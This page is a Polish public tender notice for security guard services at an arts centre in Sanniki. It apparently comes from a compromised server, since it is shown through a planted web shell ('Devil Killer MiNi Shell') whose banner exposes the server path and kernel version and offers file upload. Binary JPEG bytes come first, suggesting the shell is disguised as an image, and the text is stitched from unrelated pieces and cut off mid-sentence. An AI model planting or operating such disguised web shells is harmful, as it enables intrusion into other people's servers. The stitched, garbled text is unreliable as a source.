JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211217/0032131001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bezpośrednia ochrona fizyczna osób i mienia obiektów Europejskiego Centrum Artystycznego im. Fryderyka Chopina w Sannikach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Europejskie Centrum Artystyczne im. Fryderyka Chopina w Sannikach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140329131</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 142</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sanniki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 268 11 08</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 268 11 08</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ecasanniki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ecasanniki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bezpośrednia ochrona fizyczna osób i mienia obiektów Europejskiego Centrum Artystycznego im. Fryderyka Chopina w Sannikach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-75155897-5f23-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00321310</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00012162/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Bezpośrednia ochrona fizyczna osób i mienia na terenie Europejskiego Centrum Artystycznego im. Fryderyka Chopina w Sannikach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.ecasanniki.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Składanie ofert za pośrednictwem miniPortalu - https://miniportal.uzp.gov.pl<br/>2.Komunikacja zamawiającego z wykonawcami - 1)poczta elektroniczna:sekretariat@ecasanniki.pl, lub 2)miniPortal https://miniportal.uzp.gov.pl, lub3) ePUAP https://epuap.gov.pl/wps/portal.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/warunkiUslugi.aspx oraz Warunkach korzystania z ePUAP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), informuję, iż:<br/>1.	Administratorem Pani/Pana danych osobowych jest Europejskie Centrum Artystyczne im. Fryderyka Chopina w Sannikach, ul. Warszawska 142, 09-540 Sanniki. Kontakt z administratorem jest możliwy za pomocą tel. 24 268-11-08; adresu e-mail: sekretariat@ecasanniki.pl<br/>2.	Kontakt z Inspektorem Ochrony Danych poprzez adres e-mail: iod@ecasanniki.pl<br/>3.	Pani/Pana dane osobowe przetwarzane będą w celach związanych z zawarciem i realizacją umowy oraz w celu dochodzenia ewentualnych roszczeń<br/>4.	Podstawą przetwarzania Pani/Pana danych osobowych jest Art. 6 ust. 1 lit. b (w szczególnych przypadkach zastosowanie mogą mieć inne przepisy art. 6 ust. 1) ogólnego rozporządzenia o ochronie danych z dnia 27 kwietnia 2016 r.<br/>5.	Odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa oraz podmioty uczestniczące w realizacji usług<br/>6.	Pani/Pana dane osobowe będą przechowywanie nie dłużej niż to wynika z przepisów o archiwizacji<br/>7.	Posiada Pani/Pan prawo dostępu do danych osobowych, ich sprostowania, usunięcia lub ograniczenia przetwarzania, prawo do wniesienia sprzeciwu wobec przetwarzania oraz prawo do przenoszenia danych<br/>8.	Posiada Pani/Pan prawo do cofnięcia zgody w dowolnym momencie, poprzez kontakt z administratorem danych <br/>9.	Posiada Pani/Pan prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych<br/>10.	Podanie danych osobowych jest obligatoryjne w oparciu o przepisy prawa, a w pozostałym zakresie jest dobrowolne<br/>11.	Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany, w tym profilowane</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ECA.ZP.2600.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia sklasyfikowano według wspólnego słownika zamówień pod kodem <br/>CPV: 79710000-4 usługi ochroniarskie, nr. PKWiU 80.20.10.0 – Usługi ochroniarskie w <br/>zakresie systemów bezpieczeństwa.<br/>2. Przedmiotem Zamówienia jest świadczenie na rzecz Zamawiającego przy pomocy <br/>pracowników ochrony usługi stałej: bezpośrednia ochrona fizyczna osób i mienia obiektów <br/>Europejskiego Centrum Artystycznego im. Fryderyka Chopina w Sannikach (pałac, park <br/>wraz z obiektami, tj. muszla koncertowa, boiska sportowe i wszelkie inne obiekty i <br/>urządzenia znajdujące się na terenie parku). <br/>3. Szczegółowe warunki sprawowania ochrony reguluje ustawa z dnia 22 sierpnia 1997 r. o <br/>ochronie osób i mienia (Dz.U.2021 poz.1995 t. j.).<br/>4. Wykonawca zobowiązany jest do całodobowego kompleksowego dozoru, ochrony i <br/>monitoringu obiektu – Pałacu wraz z przyległym terenem i wszelkimi budynkami i <br/>urządzeniami znajdującymi się w jego obrębie, zlokalizowanego w Sannikach ul. <br/>Warszawska 142 w następujący sposób:<br/>- w okresie 01.01.2022 – 31.12.2022 r codziennie całodobowo (24h/doba) 1 pracownik <br/>ochrony w systemie zmianowym, wpisany na listę kwalifikowanych pracowników ochrony <br/>fizycznej;<br/>- zapewnienie dojazdu uzbrojonego patrolu interwencyjnego w czasie do 15 minut;<br/>- wykonawca w ramach zamówienia zobowiązany jest do zapewnienia ochrony podczas <br/>trwania 4 koncertów z cyklu „Smaki Muzyki” organizowanych w 2022 roku. Należy <br/>przyjąć czas trwania każdego z koncertów 4 godziny oraz ilość pracowników ochrony 2 <br/>osoby. Koszt ochrony imprezy należy skalkulować w cenie oferty.<br/>5. Informacja o systemach ochrony technicznej zainstalowanych w chronionym obiekcie:<br/>5.1. system wentylacji i klimatyzacji;<br/>5.2. system alarmowy ppoż podłączony do systemu alarmowania Państwowej Straży <br/>Pożarnej;<br/>5.3. system sygnalizacji włamania;<br/>5.4. system monitoringu wizyjnego.<br/>6. Zamawiający zapewni dla potrzeb pracowników ochrony pomieszczenie <br/>socjalne, w którym poza pracownikami ochrony mogą przebywać jedynie wyznaczone <br/>przez Zamawiającego osoby. <br/>7. Powyższe zadania powinny być realizowane przez pracowników ochrony, wpisanych na <br/>listę kwalifikowanych pracowników ochrony, wyposażonych w środki łączności <br/>bezprzewodowej.<br/>Wymagania Zamawiającego względem Wykonawcy niezbędne do prawidłoweg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami:<br/>Cena - waga kryterium 60% ( max 60 pkt.);<br/>Doświadczenie - waga kryterium 40% (max 40pkt)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o <br/>których mowa w art. 112 ust.1 ustawy Pzp i którzy wykażą ich spełnianie na poziomie <br/>wymaganym przez Zamawiającego zgodnie z opisem zamieszczonym poniżej, oraz <br/>niepodlegający wykluczeniu z powodu niespełniania warunków, o których mowa w art. <br/>108 ust 1 ustawy Pzp.<br/>2. Zamawiający na podstawie art. 112 ust. 2 ustawy Pzp określa warunki udziału <br/>w postępowaniu. Wykonawcy zobowiązani będą spełnić warunki dotyczące:<br/>1) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże iż posiada ważną koncesję na <br/>usługi ochrony osób i mienia zgodnie z ustawą z dnia 22.08.1997 r. o ochronie osób i <br/>mienia (Dz.U.2021 poz. 1996 t. j.).<br/>2) Sytuacji ekonomicznej lub finansowej<br/>Na potwierdzenie spełniania warunku Wykonawcy ubiegający się o udzielenie <br/>zamówienia zobowiązani będą wykazać, że są ubezpieczeni od odpowiedzialności <br/>cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem <br/>zamówienia na sumę gwarancyjną nie mniejszą niż 1 000 000 zł.<br/>Uwaga: wartości podane w walutach innych niż PLN należy przeliczyć na PLN wg <br/>średniego kursu NBP na dzień wystawienia dokumentu potwierdzającego ubezpieczenie <br/>Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/>związanej z przedmiotem zamówienia. Wykonawca zobowiązany jest podać kurs <br/>przeliczeniowy.<br/>3) zdolności technicznej lub zawodowej:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi wykaz usług wykonanych <br/>lub wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich <br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały <br/>wykonane. Wykaz musi zawierać co najmniej 3 usługi ochrony osób i mienia, <br/>realizowanych w sposób ciągły przez okres co najmniej 12 miesięcy o wartości co <br/>najmniej 50 000 zł każda. Jedna z powyższych usług musi być wykonana lub <br/>wykonywana obecnie na terenie obiektu zabytkowego, wpisanego do rejestru zabytków. <br/>Wykonawca musi załączyć dowody potwierdzające, że każda z tych usług została <br/>wykonana lub jest wykonywana należycie. <br/>Dowodami, o których mowa powyżej są:<br/>- referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi <br/>były lub są wykonywane;<br/>- jeżeli Wykonawca nie jest w stanie uzyskać referencji z powodu wystąpienia <br/>uzasadnionej przyczyny o obiektywnym charakterze wtedy przedstawia oświadczenie <br/>własne;<br/>- w przypadku usług nadal wykonywanych referencje bądź inne dokumenty powinny <br/>być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w <br/>postępowaniu.<br/>Brak wykazu lub dowodów potwierdzającego należyte wykonanie usługi ocenione <br/>zostanie jako niespełnianie warunku, co skutkować będzie wykluczeniem Wykonawcy z <br/>postępowania. <br/>Dysponuje co najmniej 5 pracownikami ochrony, wpisanymi na listę kwalifikowalnych <br/>pracowników ochrony, zdolnymi do realizacji niniejszego zamówienia, z których każdy <br/>posiada wynikający z jednego kontraktu min. 6 miesięczny staż pracy polegający na <br/>ochronie mienia w obiektach wpisanych do rejestru zabytków, nabyty w ciągu ostatnich <br/>trzech lat przed upływem terminu składania ofert.<br/>Dysponuje uzbrojoną grupą interwencyjną wyposażoną w oznakowane pojazdy oraz <br/>środki łączności bezpośredniej.<br/>Zamawiający zastrzega do osobistego wykonania przez Wykonawcę wszystkich <br/>czynności objętych niniejszym zamówieniem za wyjątkiem grupy interwencyjnej, w tym <br/>zakresie dopuszcza się podwykonawstwo.<br/>Zgodnie z treścią art.118 ust. 1 ustawy Pzp. Wykonawca może polegać na wiedzy i <br/>doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub <br/>zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od <br/>charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji <br/>zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w <br/>trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne <br/>zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na <br/>potrzeby wykonania zamówienia Zobowiązanie powinno zawierać informacje wynikające<br/>z art. 118 ust.4 pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych, które Wykonawca składa w postępowaniu <br/>na wezwanie Zamawiającego na potwierdzenie okoliczności, o których mowa w art. 108 <br/>ustawy Pzp, znajduje się w ust. 2.<br/>2. Po badaniu ofert pod kątem spełniania przesłanek odrzucenia oraz po wstępnej <br/>weryfikacji oświadczeń dotyczących spełniania warunków oraz braku podstaw do <br/>wykluczenia,<br/>Wykonawca, którego oferta zostanie najwyżej oceniona na wezwanie Zamawiającego <br/>zobowiązany będzie złożyć następujące dokumenty:<br/>1) Informacji z Krajowego Rejestru Karnego w zakresie:<br/>a) art. 108 ust. 1 pkt 1 i 2 ustawy Pzp,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się o zamówienie <br/>publiczne tytułem środka karnego,<br/>sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>2)oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), <br/>z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek <br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału <br/>w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy <br/>kapitałowej;<br/>3)oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami <br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych, które Wykonawca składa w postępowaniu <br/>na wezwanie Zamawiającego na potwierdzenie okoliczności, o których mowa w art. 108 <br/>ustawy Pzp, znajduje się w ust. 2<br/> Koncesję na ochronę osób i mienia w zakresie i formie zgodnej z charakterem <br/>zamówienia w przedmiotowym postępowaniu;<br/>5) Wykaz wykonanych lub wykonywanych usług ochrony osób i mienia w budynkach <br/>użyteczności publicznej w okresie ostatnich trzech lat przed upływem terminu składania <br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, każda trwająca <br/>minimum 12 kolejnych miesięcy z załączeniem dokumentów potwierdzające, że usługi te <br/>zostały wykonane należycie. Wykaz musi zawierać co najmniej 3 usługi o wartości co <br/>najmniej 50 000 zł każda, w tym co najmniej 1 usługa powinna być wykonana bądź <br/>wykonywana na obiekcie wpisanym do rejestru zabytków– załącznik nr 4 do SIWZ;<br/>6) Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego <br/>wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania <br/>przedmiotowego zamówienia oraz informację o podstawie do dysponowania tymi <br/>osobami. Wykaz ma obejmować co najmniej 5 osób wpisanych na listę kwalifikowanych <br/>pracowników ochrony fizycznej z których każdy posiada wynikający z jednego kontraktu <br/>min. 6 miesięczny staż pracy polegający na ochronie mienia w obiektach wpisanych do <br/>rejestru zabytków, nabyty w ciągu ostatnich trzech lat przed upływem terminu składania <br/>ofert.<br/>W powyższym Wykazie osób Wykonawca zawiera informację na temat doświadczenia <br/>pracowników w zakresie wykonywania czynności ochrony fizycznej na obiektach <br/>wpisanych do rejestru zabytków. Na podstawie tego wykazu będą dodawane dodatkowe <br/>punkty w ramach kryterium oceny „Doświadczenie pracowników w zakresie okresu <br/>wykonywania czynności w zakresie ochrony fizycznej na obiektach wpisanych do rejestru <br/>zabytków.<br/>UWAGA: wykaz należy złożyć razem z formularzem ofertowym i do którego należy <br/>również dołączyć dowody określające , czy dana usługa została wykonana należycie.<br/>Wykonawca, który nie przedstawi wykazu osób zdolnych do wykonania zamówienia <br/>zgodnie z opisanym warunkiem zostanie wykluczony z postępowania – załącznik nr.6 do <br/>SIWZ;<br/>7) Wykaz pojazdów, grup interwencyjnych, wyposażenia oraz urządzeń technicznych w <br/>celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. <br/>Wzór wykazu stanowi załącznik nr. 5 do SIWZ;<br/>8) Aktualną i opłaconą polisę ubezpieczenia OC w zakresie zgodnym z prowadzoną <br/>działalnością na kwotę minimum 1 000 000,00 (jeden 